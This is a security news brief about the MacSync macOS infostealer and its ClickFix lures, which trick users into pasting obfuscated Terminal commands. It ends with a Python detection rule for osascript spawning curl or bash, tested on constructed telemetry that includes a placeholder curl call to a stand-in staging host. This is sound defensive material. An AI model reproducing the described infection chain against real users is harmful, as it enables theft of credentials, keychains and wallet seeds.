MacSync spreads via fake AI tools
A macOS infostealer called MacSync is being distributed through fake AI tool installers and malicious Terminal commands, with campaigns such as 'ClickFix' weaponizing developer workflows to steal credentials. The attack pattern underlines that provenance checks for developer tooling and strict shell-command policies are now operational necessities.
Sophos reported that three distinct ClickFix campaigns ran from November 2025 through February 2026, using Google-sponsored search results and shared ChatGPT conversations as lures to persuade victims to paste obfuscated Terminal commands. (sophos.com)

The Cloud Security Alliance, in its March 16, 2026 research note, documented attacker infrastructure of more than 250 compromised WordPress sites across 12 countries, attributing that scale to the ClickFix delivery model's reuse of cloned and SEO-poisoned landing pages. (labs.cloudsecurityalliance.org)

Jamf Threat Labs published a December 22, 2025 analysis of a code-signed, notarized Swift variant packaged in a 25.5MB DMG that carried Developer Team ID GNJLS3UYZ4; Jamf reported that the associated certificate was revoked after disclosure. (jamf.com)

Microsoft Defender researchers observed MacSync alongside other macOS infostealers such as DigitStealer and AMOS in February 2026, noting that these campaigns have been active since late 2025 and that the threat actors rely on fileless execution and native macOS utilities for credential harvesting. (microsoft.com)

Technical telemetry from Sophos and iSec shows the typical chain: a pasted command downloads an obfuscated Bash loader, which retrieves AppleScript payloads that prompt for the system password and then execute in memory to exfiltrate browser sessions, keychain items and wallet seed phrases. (sophos.com)

Sophos specifically recommended blocking Terminal for standard accounts via MDM, deploying Privacy Preferences Policy Control (PPPC) rules to pre-deny Terminal Full Disk Access, and adding EDR rules that flag osascript spawning curl or bash child processes (the parent→child T1059.002→T1059.004 chain) as actionable detections. (sophos.com)
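The last recommendation above can be written as a process-tree rule. The following is an added illustration, not code from Sophos or from any vendor's EDR: it runs the osascript→curl/bash parent-child check over a small set of constructed process-start events and returns the full ancestry of each hit, so an analyst can see the pasted-command origin in Terminal. The event fields, sample PIDs, placeholder command lines and the `example.invalid` hostname are all assumptions; `sh` and `zsh` are added as flagged children beyond the curl and bash the page names.

```python
"""Process-tree detection for the osascript -> curl/bash chain (added example, constructed data)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-start event as an EDR might record it (field names are assumed)."""
    pid: int
    ppid: int
    exe: str       # executable basename
    cmdline: str
    user: str


# curl and bash are the children the Sophos guidance names; sh and zsh are an
# assumption, added because a loader can just as easily call either of them.
FLAGGED_CHILDREN = {"curl", "bash", "sh", "zsh"}
SHELLS = {"bash", "sh", "zsh"}


def ancestry(event, by_pid, max_depth=16):
    """Return the exe chain from the root process down to `event`,
    e.g. 'launchd>Terminal>zsh>bash>osascript>curl'."""
    chain, cur, seen = [], event, set()
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        seen.add(cur.pid)
        chain.append(cur.exe)
        cur = by_pid.get(cur.ppid)
    return ">".join(reversed(chain))


def find_osascript_spawns(events):
    """Flag every event whose parent is osascript and whose exe is a flagged child.
    The rule keys on the parent, so a developer's own curl from an interactive
    shell, or an osascript that spawns nothing, is not reported."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in sorted(events, key=lambda e: e.pid):
        parent = by_pid.get(child.ppid)
        if parent is None or parent.exe != "osascript":
            continue
        if child.exe not in FLAGGED_CHILDREN:
            continue
        hits.append({
            "child_pid": child.pid,
            "child_exe": child.exe,
            "parent_pid": parent.pid,
            "user": child.user,
            # T1059.002 (AppleScript) -> T1059.004 (Unix Shell) is the chain the page cites;
            # a direct curl child is labelled plainly rather than with a guessed technique ID.
            "attack_chain": "T1059.002->T1059.004" if child.exe in SHELLS else "T1059.002->curl",
            "process_tree": ancestry(child, by_pid),
            "cmdline": child.cmdline,
        })
    return hits


# Constructed sample telemetry: one ClickFix-style chain plus two benign lookalikes.
# Loader and script bodies are placeholders, not real payload text.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "launchd", "/sbin/launchd", "root"),
    ProcEvent(400, 1, "Terminal",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "alice"),
    ProcEvent(410, 400, "zsh", "-zsh", "alice"),
    ProcEvent(420, 410, "bash", "bash -c '<OBFUSCATED_LOADER_PLACEHOLDER>'", "alice"),
    ProcEvent(430, 420, "osascript", "osascript -e '<PASSWORD_PROMPT_SCRIPT_PLACEHOLDER>'", "alice"),
    ProcEvent(440, 430, "curl", "curl -s https://stage.example.invalid/p", "alice"),
    ProcEvent(441, 430, "bash", "bash -c '<STAGE2_PLACEHOLDER>'", "alice"),
    # benign: a scheduled AppleScript that spawns no children
    ProcEvent(500, 1, "osascript", "osascript /Users/alice/Library/Scripts/backup.scpt", "alice"),
    # benign: a developer running curl from their interactive shell
    ProcEvent(600, 410, "curl", "curl -sI https://example.com", "alice"),
]


if __name__ == "__main__":
    for hit in find_osascript_spawns(SAMPLE_EVENTS):
        print(hit["attack_chain"], hit["process_tree"], hit["cmdline"])
```

In a deployment the events would come from the EDR's process telemetry rather than the inline list; the `process_tree` field is what makes the alert actionable, because it shows whether the osascript parent descends from a Terminal session (a pasted command) or from a launch agent or legitimate automation tool.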